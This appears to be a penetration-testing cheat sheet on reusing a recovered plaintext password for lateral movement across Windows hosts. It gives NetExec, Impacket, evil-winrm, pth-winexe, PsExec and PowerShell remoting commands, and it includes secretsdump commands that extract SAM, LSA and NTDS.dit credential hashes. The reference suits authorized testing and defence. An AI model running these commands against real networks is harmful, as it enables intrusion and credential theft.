
Pass the Password

Overview

You have cracked a hash or otherwise recovered the plaintext password of a domain (or local) user. Use that password with nxc to try it against other hosts on the network and see which target(s) accept the credential, and on which of them it also grants local-admin rights.


NetExec

nxc smb <target-or-CIDR> -d 'domain.tld' -u username -p password

Pass the password of a domain user. Add --continue-on-success to keep trying every host after the first hit; hosts where the account is a local admin are tagged (Pwn3d!) in the output.

nxc smb <target-or-CIDR> --local-auth -u username -p password

Pass the password of a local user. --local-auth authenticates against the host's local SAM instead of the domain, so the same local account and password can be tried across many hosts.



Impacket Toolkit

Kali Linux packages a set of wrappers around the Impacket example scripts. In most cases you can run impacket-scriptName, e.g. impacket-getTGT, to invoke getTGT.py. The original Impacket scripts are under /usr/share/doc/python3-impacket/examples/.

impacket-smbexec

impacket-smbexec 'domain.tld/user.name:password@target'

impacket-smbexec wrapper on Kali Linux. Each command runs through a temporary service that writes its output to a share, so no binary is uploaded, but a service is created (and logged) per command.

impacket-wmiexec

impacket-wmiexec 'domain.tld/user.name:password@target' cmd.exe

impacket-wmiexec wrapper on Kali Linux. Executes via WMI over DCOM (TCP/135 plus a dynamic port) and collects command output through the ADMIN$ share; it creates no service on the target.

impacket-psexec

impacket-psexec 'domain.tld/user.name:password@target' cmd.exe

impacket-psexec wrapper on Kali Linux. Like Sysinternals PsExec, it uploads a service binary to ADMIN$ and creates a service, which makes it the noisiest of the three.


impacket-secretsdump

impacket-secretsdump 'domain.tld/user.name:password@target'

impacket-secretsdump wrapper on Kali Linux. Dumps the SAM, LSA secrets and cached domain credentials from the target and needs local-admin rights on it. Against a domain controller, add -just-dc to pull the NTDS.dit hashes via DRSUAPI.



WinRM

  • WinRM over HTTP – TCP/5985
  • WinRM over HTTPS – TCP/5986

evil-winrm -i <target_ip> -u username -p password

Pass the password over WinRM. The account must be a local admin or a member of the Remote Management Users group on the target; add -S to use the HTTPS listener on TCP/5986.



Passing-the-Hash Suite

pth-winexe

pth-winexe --user='domain.tld/user.name%password' //target-ip cmd.exe

pth-winexe from the passing-the-hash package. The --user value is domain/user%password; the same field also accepts an LM:NT hash in place of the password.



Windows Binaries

psexec.exe

Requires the Sysinternals psexec.exe binary on a Windows host

# Start a remote command prompt
.\psexec.exe \\target-ip -u username -p password -i cmd.exe
            |                                                  |
            | 1. Upload PSEXESVC.exe via the ADMIN$ share ===> |
            |                                                  |
[attacker]  | 2. Create and start the PSEXESVC service ======> | [target]
            |                                                  |
            | 3. <======= Communicate via \\.\pipe\PSEXESVC    |
            |                                                  |

The uploaded service binary, the PSEXESVC service and the named pipe are the artifacts that make PsExec easy to spot on the target.

PowerShell PSSession

Interactive Session

# Build a PSCredential from a plaintext password (no interactive prompt);
# for a domain account use 'domain.tld\user.name' as the username
$username = 'user.name'
$password = 'mypass' | ConvertTo-SecureString -AsPlainText -Force
$credential = [pscredential]::new($username, $password)
# Connecting by IP address rules out Kerberos, so the WinRM client must either
# trust the target (Set-Item WSMan:\localhost\Client\TrustedHosts target-ip)
# or use HTTPS on TCP/5986 (-UseSSL)
$session = New-PSSession -ComputerName target-ip -Credential $credential
$session | Enter-PSSession

# When finished
$session | Remove-PSSession

Ad-Hoc Commands

$username = 'user.name'
$password = 'mypass' | ConvertTo-SecureString -AsPlainText -Force
$credential = [pscredential]::new($username, $password)
# Run one script block remotely and return its output; -ComputerName accepts
# several targets at once, so the same credential can be fanned out
Invoke-Command -ComputerName target-ip -Credential $credential -ScriptBlock {Get-ComputerInfo}